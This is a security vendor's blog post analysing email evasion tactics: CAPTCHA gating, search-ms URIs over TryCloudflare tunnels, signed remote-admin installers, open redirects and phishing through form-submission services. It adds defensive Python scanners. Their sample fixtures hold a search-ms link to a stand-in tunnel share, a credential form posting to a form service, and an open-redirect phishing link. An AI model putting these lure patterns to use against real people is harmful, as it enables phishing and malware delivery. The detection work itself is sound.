Staying Ahead: Understanding the Latest Email Evasion Tactics

Written by Kalpesh Mantri, Principal Research Engineer | Aug 14, 2024 5:20:42 PM

Introduction

Email remains a cornerstone of modern communication, yet it continues to be a primary vector for cyber threats. Cybercriminals have consistently refined their tactics, particularly in evading detection systems. The rise of sophisticated evasion techniques has made detecting and neutralizing email-based malware increasingly challenging. Understanding these evolving threats is crucial for organizations to adapt their security strategies effectively.

This blog explores emerging trends in email-based malware evasion, focusing on the latest strategies used by cybercriminals. By examining case studies, understanding common evasion techniques, and discussing the future of malware evasion, we aim to equip readers with the knowledge necessary to protect themselves and their organizations from these stealthy threats.

Current Email Threat Landscape

At Inception Cyber, our continuous monitoring of the email threat landscape reveals a shift towards more complex evasion techniques. Our research shows that email payloads are predominantly URL or attachment-based, with attackers heavily relying on HTML, PDF, and archive file formats. These formats are favored due to their ability to evade security filters, their familiarity and trust among users, and their potential for embedding malicious content. Additionally, they offer cross-platform compatibility and provide rich opportunities for social engineering, making them ideal for cybercriminals.

Figure 1: Top payloads in malspam emails

Noteworthy Evasion Techniques in Current Email Threats

Our analysis has uncovered compelling case studies demonstrating how attackers are not only using evasion techniques within email communications but also across the entire attack kill chain. These real-world examples underscore the rapid evolution of attacker strategies, particularly their sophisticated use of legitimate services to bypass traditional detection technologies at every stage of an attack.

Case Study #1: Exploiting Legitimate Services with Cloudflare reCAPTCHA

In a recent malspam campaign, we observed attackers leveraging Cloudflare reCAPTCHA services to evade automated analysis and security filters. This tactic increases the chances of their malicious pages going undetected by blocking automated tools and adding an air of legitimacy. The reCAPTCHA mechanism delays analysis, filters out non-human traffic, and ensures that only real users—especially targeted victims—proceed to the next stage of the attack. This underscores the need for advanced security measures and heightened user awareness to combat sophisticated threats.

Figure 2.0: Kill chain for malspam using legitimate services

Combining several evasion tactics lets the email slip past corporate security filters. The notable evasion techniques in the email kill chain shown in Figure 2.0 included:

| Evasion Technique | MITRE ATT&CK Tactic | Stage of Kill Chain | Technology Bypassed | Why Technology Will Be Bypassed |
| --- | --- | --- | --- | --- |
| OneDrive-themed PDF with URL to legitimate Office Forms | Phishing (T1566) | Delivery | Email security filters, URL reputation services, antivirus | The PDF and URL are associated with trusted services (OneDrive, Office Forms), making it difficult for security filters to identify the threat. |
| Leveraging Office Forms to host malicious URL | Phishing (T1566) | Delivery, Exploitation | Web security gateways, anti-phishing technology | Office Forms is a legitimate service, so URLs hosted there are often not flagged by security tools, allowing the malicious URL to bypass detection. |
| Using Cloudflare reCAPTCHA before downloading payload | Defense Evasion (T1562) | Exploitation | Web filtering, automated analysis technologies such as sandboxes | Cloudflare reCAPTCHA adds a layer of legitimacy and prevents automated tools from accessing the malicious payload, hindering detection and analysis. |

In another case, an email contained a redirector URL leading to a Freshdesk support page, which mimicked a OneDrive file and used Cloudflare CAPTCHA before downloading the malicious payload. This multi-layered evasion demonstrates the evolving sophistication of attacker tactics.

Figure 2.1: URL in the malspam body redirecting to a legitimate web page

Case Study #2: Abusing the "search-ms" URI Protocol with Cloudflare Tunnels

In recent months, we've identified a surge in emails employing advanced tactics, techniques, and procedures (TTPs) to bypass detection and enhance effectiveness. These emails, often themed around financial transactions, used HTML payloads as the initial infection vector. This particular campaign stood out due to its use of advanced evasion tactics, such as the search-ms URI protocol handler and Cloudflare tunnels.

| Evasion Technique | MITRE ATT&CK Tactic | Stage of Kill Chain | Technology Bypassed | Why Technology Will Be Bypassed |
| --- | --- | --- | --- | --- |
| HTML-smuggled search-ms URL protocol handler link | Execution (T1204) | Delivery, Exploitation | Web content filters, endpoint security technologies | The search-ms protocol is legitimate, making it difficult for filters to block without affecting legitimate usage; endpoint security may not recognize it as malicious. |
| Malware delivery via Cloudflare Tunnel abuse | Command and Control (T1071) | Delivery, Exploitation | Network security technologies, traffic inspection | Cloudflare tunnels encrypt traffic and obfuscate command and control communication, bypassing traditional network security and inspection tools. |
| Payload staging via WebDAV and SMB | Execution (T1204), Lateral Movement (T1021) | Exploitation, Installation | Endpoint detection, network monitoring technologies | WebDAV and SMB protocols are often used legitimately, allowing attackers to stage payloads without triggering alarms. |
| Code obfuscation of helper scripts | Defense Evasion (T1027) | Exploitation, Installation | Antivirus, script analysis technologies | Obfuscation techniques make the malicious code difficult to detect or analyze, evading antivirus and traditional script analysis technologies. |

Figure 3: Malspam abusing the "search-ms" URI protocol handler with Cloudflare Tunnels

The use of the search-ms protocol handler allows Windows users to perform search operations via a URI. In this case, attackers use this feature along with TryCloudflare tunnels as part of a malware campaign. TryCloudflare tunnels enable cybercriminals to create temporary infrastructure. Each TryCloudflare tunnel generates a random subdomain on trycloudflare[.]com, with traffic to these subdomains being proxied through Cloudflare to the attackers' local server.

This case study highlights the evolving and sophisticated nature of modern email-based attacks, emphasizing the importance of staying vigilant and adapting security measures to counter these advanced evasion techniques.

Case Study #3: Exploiting Signed Payload on Legitimate Cloud Hosting

A recent malware campaign targeting Israeli companies utilized a well-known technique where attackers exploited recent news events (CrowdStrike outage and the Israel-Hamas war) to craft their emails. This strategy, which capitalizes on heightened interest and urgency, increases the likelihood of recipients engaging with malicious content.

Figure 4: Email exploiting legitimate cloud hosting with a signed payload

The email contained a link to a .zip file with an installer (.msi) that included a pre-configured Atera remote admin agent capable of taking control of Windows devices. This combination of tactics made the malware particularly effective and difficult to detect.

In this particular campaign, attackers employed multiple evasion tactics:

| Evasion Technique | MITRE ATT&CK Tactic | Stage of Kill Chain | Technology Bypassed | Why Technology Will Be Bypassed |
| --- | --- | --- | --- | --- |
| Use of recent event-themed email | Phishing (T1566) | Delivery | Email filtering services, user awareness programs | Attackers exploit the timeliness and relevance of events to create urgency, which can lead to users bypassing normal caution and security checks. |
| Malicious payload signed by Atera | Defense Evasion (T1218) | Execution | Endpoint protection, digital signature verification | The payload is signed, causing endpoint protection and signature verification systems to treat it as legitimate. |
| Payload hosted on legitimate cloud storage (Onehub) | Command and Control (T1071) | Delivery, Exploitation | URL filtering, network security technologies | Hosting the payload on a reputable cloud service bypasses URL filtering and security tools that trust domains like Onehub, allowing the download and execution of malicious content. |

Case Study #4: Abusing Open Redirect Vulnerabilities

We observed a significant rise in phishing campaigns that exploit open redirect vulnerabilities. Attackers manipulate a URL so that it appears legitimate while redirecting the victim to a malicious site, deceiving both users and security systems. This lets them bypass security filters that do not scrutinize the final destination of a trusted URL, convince users that they are visiting a safe website, and raise the odds of successful phishing or malware delivery. By leveraging open redirects, attackers effectively disguise their malicious intent and make their campaigns more effective.

Figure 5.0: Email exploiting open redirect feature of legitimate websites

The email in question redirects the victim to NaukriGulf, a legitimate job site for the Gulf region. The URL, however, comes from a phishing email and carries a redirect link: when users click it, they briefly land on the legitimate page before being redirected to a phishing site.

For this case, attackers use tactics like:

| Evasion Technique | MITRE ATT&CK Tactic | Stage of Kill Chain | Technology Bypassed | Why Technology Will Be Bypassed |
| --- | --- | --- | --- | --- |
| Spoofing sender domain with a call-to-action in email body | Phishing (T1566) | Delivery | Email filtering services, sender authentication checks (SPF/DKIM/DMARC) | The spoofed domain can closely mimic a legitimate one, and the call-to-action often appears urgent, leading users to act without scrutiny. Existing authentication checks might not detect the subtle differences or may be bypassed entirely if the spoofed domain is convincing. |
| Abusing redirect feature of a legitimate web page | Phishing (T1566) | Exploitation | Web filters, URL reputation services | Attackers exploit the legitimate website's redirect feature, making the malicious link appear trustworthy. Web filters and URL reputation services may not block the redirect since the initial domain is reputable. |

In a similar case, a malspam campaign tricked recipients with a claim that they had a voicemail waiting. Here too, the email combined multiple evasion techniques to avoid traditional security detections.

Figure 5.1: Malspam with spoofed email headers and a redirect URL

By employing an open redirect, attackers mask the malicious link behind a trusted domain, allowing them to evade security measures that assess a domain’s reputation and age to filter out threats.
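
A defender-side check for this pattern, added here as an example and not code from the original post: it scans an email body for links whose query string carries an absolute URL for a different site, the open-redirect shape described above, and also catches protocol-relative and double-encoded targets. The hostnames, the voicemail sample body and the registrable-domain heuristic are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

URL_RE = re.compile(r"""https?://[^\s"'<>]+""")

def site_of(host):
    # Rough registrable-domain check (last two labels); use the Public Suffix
    # List in production so that co.uk-style domains are handled correctly.
    return ".".join(host.lower().split(".")[-2:])

def embedded_redirect_target(url):
    """Return (outer_host, inner_host) when a query parameter of `url` carries
    an absolute URL for a different site, otherwise None."""
    outer = urlsplit(url)
    outer_host = (outer.hostname or "").lower()
    for _, value in parse_qsl(outer.query, keep_blank_values=True):
        candidate = unquote(value).strip()   # extra decode catches double-encoded targets
        if candidate.startswith("//"):       # protocol-relative target still leaves the site
            candidate = "https:" + candidate
        inner = urlsplit(candidate)
        if inner.scheme in ("http", "https") and inner.hostname:
            inner_host = inner.hostname.lower()
            if site_of(inner_host) != site_of(outer_host):
                return outer_host, inner_host
    return None

def find_open_redirects(body):
    """Scan an email body and return (url, outer_host, inner_host) for each
    link whose trusted first hop forwards to another site."""
    hits = []
    for url in URL_RE.findall(body):
        r = embedded_redirect_target(url)
        if r:
            hits.append((url, r[0], r[1]))
    return hits

# Constructed voicemail-lure body (not from the campaign): the first link hides a
# phishing host behind a reputable-looking redirector, the second is benign.
SAMPLE_BODY = """You have a new voicemail (0:42). Listen now:
https://www.example-jobs.test/redirect?url=https%3A%2F%2Fvm-login.example-phish.test%2Fplay
Manage preferences: https://www.example-jobs.test/prefs?next=https://careers.example-jobs.test/settings
"""
```

A hit is a reason to resolve the redirect chain in a sandbox and apply reputation checks to the final host rather than to the reputable first hop.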

Case Study #5: Credential Phishing via Submission Form Services

HTML/SHTML smuggling campaigns have emerged as a significant attack vector, with an increase in credential phishing attacks through fake documents featuring login pages. A notable trend is the use of submission form services like NoCodeForm, Submit-Form, and Formbold to create deceptive phishing pages and streamline the collection of stolen credentials.

Figure 6: Credential phishing email campaign kill chain

In this case, attackers employ the following evasion tactics:

| Evasion Technique | MITRE ATT&CK Tactic | Stage of Kill Chain | Technology Bypassed | Why Technology Will Be Bypassed |
| --- | --- | --- | --- | --- |
| Use of reputable submission form services | Phishing (T1566) | Delivery | Email filtering services, domain reputation checks | Attackers leverage legitimate services, making detection difficult as the domain is trusted and not flagged by reputation checks. |
| HTML/SHTML smuggling payload | Command and Control (T1071) | Exploitation | Network security tools, content inspection | Attackers leverage legitimate services, making detection difficult as the domain is trusted and not flagged by reputation checks. |
| Credential phishing via fake documents | Credential Access (T1078) | Delivery, Exploitation | Email security gateways, user training programs | Fake documents appear authentic, bypassing security filters; users are deceived by well-crafted phishing sites that mimic legitimate services. |
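
Added example covering both Case Study #2 and Case Study #5 (not code from the original post): a small scanner for HTML email attachments that flags search-ms: links and TryCloudflare hostnames from the first case, and login forms posting to the form-collection services named in the second. The service domains, the placeholder tunnel hostname and the sample attachment are assumptions made for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# Indicator lists assumed for this example: the TryCloudflare suffix from the
# text and the form services named on the page (tune to your environment).
TUNNEL_SUFFIXES = (".trycloudflare.com",)
FORM_SERVICE_HOSTS = ("nocodeform.io", "submit-form.com", "formbold.com")
CRUMB_RE = re.compile(r"crumb=location:(\\\\[^&\s]+)", re.I)   # UNC path Explorer will search
UNC_HOST_RE = re.compile(r"\\\\([^\\@]+)")                     # host part of \\host@SSL\share

class AttachmentScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (finding_type, value) tuples

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self._check_link(unquote(a["href"].strip()))
        elif tag == "form" and a.get("action"):
            # Login-style form posting to a form-collection service (Case Study #5).
            host = (urlsplit(a["action"]).hostname or "").lower()
            if host.endswith(FORM_SERVICE_HOSTS):
                self.findings.append(("form-service-action", host))

    def _check_link(self, href):
        if href.lower().startswith("search-ms:"):
            # search-ms: link (Case Study #2); the crumb names the WebDAV/SMB
            # share, which in that campaign sat behind a TryCloudflare tunnel.
            m = CRUMB_RE.search(href)
            loc = m.group(1) if m else "?"
            self.findings.append(("search-ms-uri", loc))
            h = UNC_HOST_RE.match(loc)
            host = h.group(1).lower() if h else ""
        else:
            host = (urlsplit(href).hostname or "").lower()
        if host.endswith(TUNNEL_SUFFIXES):
            self.findings.append(("tunnel-host", host))

def scan_html(html):
    p = AttachmentScanner()
    p.feed(html)
    return p.findings   # list of (finding_type, value) for one attachment

# Constructed sample attachment (not from the campaign) covering both patterns.
SAMPLE_HTML = r"""<html><body><p>Invoice 4471 is ready.</p>
<a href="search-ms:query=invoice&crumb=location:\\example-words.trycloudflare.com@SSL\DavWWWRoot&displayname=Downloads">Open</a>
<form action="https://submit-form.com/abc123" method="post">
<input name="email"><input name="password" type="password"></form></body></html>"""
```

Any search-ms-uri finding in an inbound attachment is worth quarantining outright, since mail has no legitimate reason to launch a Windows Search query against a remote share.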

Detection and Prevention Strategies for Evasive Malware

In today’s rapidly evolving threat landscape, attackers are using increasingly sophisticated, multi-layered evasion techniques that challenge even the most advanced detection systems. As Generative AI continues to evolve, the complexity and volume of these attacks will only grow, making them harder to identify. Traditional security measures—such as signature-based systems, sandboxes, and spam filters—are often inadequate against these evolving tactics.

To counter these threats effectively, adopting next-generation threat prevention strategies is crucial. AI-powered solutions provide a proactive defense that adapts to new attack vectors in real-time. Leveraging AI and large language models (LLMs) enhances defenses by enabling dynamic analysis of emerging threats, identifying patterns and anomalies that traditional methods might miss, and continuously learning from new data to refine detection and response strategies. This integration of advanced AI technologies ensures a more resilient and adaptive cybersecurity posture.

Conclusion

The current landscape of email threats is characterized by increasingly sophisticated, multi-stage attacks, with each phase involving distinct evasion techniques designed to bypass traditional security measures. As highlighted in this blog, the necessity for advanced threat prevention is more critical than ever. InceptionCyber.ai’s Neural Analysis and Correlation Engine (NACE) is uniquely equipped to tackle these challenges by going beyond traditional detection methods, ensuring robust protection against the evolving threat landscape.